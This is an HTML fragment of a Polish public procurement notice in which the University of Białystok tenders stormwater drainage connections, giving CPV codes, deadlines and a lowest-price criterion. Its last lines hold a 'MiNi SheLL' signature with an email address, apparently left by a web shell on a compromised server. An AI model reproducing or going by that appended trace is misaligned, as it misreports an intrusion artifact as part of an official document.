<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.43.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Budowa przyłącza kanalizacji deszczowej dla budynku Wydziału Ekonomii i Zarządzania przy ul. Warszawskiej 63 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część VIII: Zadanie nr 10:  
Budowa przyłącza kanalizacji deszczowej dla budynku Wydziału Ekonomii i Zarządzania przy ul. Warszawskiej 63 w Białymstoku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Budowa przyłącza kanalizacji deszczowej dla budynku mieszkalnego przy ul. Zamenhofa 15..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty inwestycyjne w obiektach Uniwersytetu w Białymstoku określone poniżej oraz zgodnie z Opisem przedmiotu zamówienia stanowiącym załącznik nr 1 do SIWZ, tj.:
Część IX: Zadanie nr 11: 
Budowa przyłącza kanalizacji deszczowej dla budynku mieszkalnego przy ul. Zamenhofa 15..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com